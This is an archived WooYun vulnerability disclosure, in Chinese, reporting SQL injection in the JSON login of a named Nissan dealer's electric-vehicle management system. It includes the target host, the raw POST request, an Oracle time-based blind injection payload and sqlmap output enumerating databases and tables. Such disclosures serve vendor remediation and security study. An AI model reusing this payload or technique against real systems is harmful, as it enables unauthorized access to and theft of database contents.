乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT、大量数据库信息
0x01 漏洞位置
eip.zznissan.com.cn:2051
还是电动车管理系统、刚才只是试了弱口令,深入测试一下0x02 漏洞类型
sql注入---登录处
0x03 漏洞详情在登录处
抓取POST包、发现请求数据是json格式、有门~~~
POST /Data/UserManagement.svc/LoginForWebUser HTTP/1.1Host: eip.zznissan.com.cn:2051User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://eip.zznissan.com.cn:2051/indexLogin.htmContent-Length: 35Connection: keep-alivePragma: no-cacheCache-Control: no-cache{"UserName":"aaa","Password":"aaa"}
0x04 漏洞利用sqlmap测试即可
0X05 漏洞结果证明于是乎、发现了大量数据信息注入信息
sqlmap identified the following injection points with a total of 101 HTTP(s) requests:---Place: (custom) POSTParameter: JSON #1* Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: {"UserName":"aaa' AND 7527=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(104)||CHR(117)||CHR(112),5) AND 'pfws'='pfws","Password":"aaa"}---[13:46:38] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Oracle
数据库信息
available databases [24]:[*] "IX\X02"[*] "OWBSYS!"[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] HR[*] MDSYS[*] OE[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTMN[*] PM[*] RICHAN[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
表数据获取就很简单了、这里不做过多深入
[15:38:08] [INFO] fetching database (schema) names[15:38:08] [INFO] fetching number of databases[15:38:08] [INFO] resumed: 24[15:38:08] [INFO] resumed: APEX_030200[15:38:08] [INFO] resumed: APPQOSSYS[15:38:08] [INFO] resumed: CTXSYS[15:38:08] [INFO] resumed: DBSNMP[15:38:08] [INFO] resumed: EXFSYS[15:38:08] [INFO] resumed: FLOWS_FILES[15:38:08] [INFO] resumed: HR[15:38:08] [INFO] resumed: IX\x02[15:38:08] [INFO] resumed: MDSYS[15:38:08] [INFO] resumed: OE[15:38:08] [INFO] resumed: OLAPSYS[15:38:08] [INFO] resumed: ORDDATA[15:38:08] [INFO] resumed: ORDSYS[15:38:08] [INFO] resumed: OUTMN[15:38:08] [INFO] resumed: OWBSYS![15:38:08] [INFO] resumed: PM[15:38:08] [INFO] resumed: RICHAN[15:38:08] [INFO] resumed: SCOTT[15:38:08] [INFO] resumed: SH[15:38:08] [INFO] resumed: SYS[15:38:08] [INFO] resumed: SYSMAN[15:38:08] [INFO] resumed: SYSTEM[15:38:08] [INFO] resumed: WMSYS[15:38:08] [INFO] resumed: XDB[15:38:08] [INFO] fetching tables for databases: 'IX, OWBSYS!, APEX_030200, APPQOSSYS, CTXSYS, DBSNMP, EXFSYS, FLOWS_FILES, HR, MDSYS, OE, OLAPSYS, ORDDATA, ORDSYS, OUTMN, PM, RICHAN, SCOTT, SH, SYS, SYSMAN, SYSTEM, WMSYS, XDB'[15:38:08] [INFO] fetching number of tables for database 'ORDSYS'[15:38:08] [INFO] resumed: 5[15:38:08] [INFO] resumed: SI_IMAGE_FORMATS_TAB[15:38:08] [INFO] resumed: SI_FEATURES_TAB[15:38:08] [INFO] resumed: SI_VALUES_TABA[15:38:08] [INFO] resumed: ORD_USAGE_RECS[15:38:08] [INFO] resumed: ORD_CARTRIDGE_COMPONENTS[15:38:08] [INFO] fetching number of tables for database 'HR'[15:38:08] [INFO] resumed: 7[15:38:08] [INFO] resumed: REGIONS[15:38:08] [INFO] resumed: LOCATIONS![15:38:08] [INFO] resumed: DEPARTMENTS[15:38:08] [INFO] resumed: JOBS[15:38:08] [INFO] resumed: EMPLOYEES[15:38:08] [INFO] resumed: JOB_HISTORY[15:38:08] [INFO] resumed: CQUNTRIES[15:38:08] [INFO] fetching number of tables for database 'APEX_030200'[15:38:08] [INFO] resumed: 360[15:38:08] [INFO] resumed: WWV_FLOW_COMPANIES[15:38:08] [INFO] resumed: WWV_FLOW_ACTIVITY_LOG_NUMBER%[15:38:08] [INFO] resumed: WWV_FLOW_USER_ACCESS_LOG_NUM$[15:38:08] [INFO] resumed: WWV_FLOW_DUAL100
测试即可、ok了
交给厂家吧
危害等级:中
漏洞Rank:10
确认时间:2015-11-27 15:57
弱口令的惨案啊。洞主用心了。谢谢!
暂无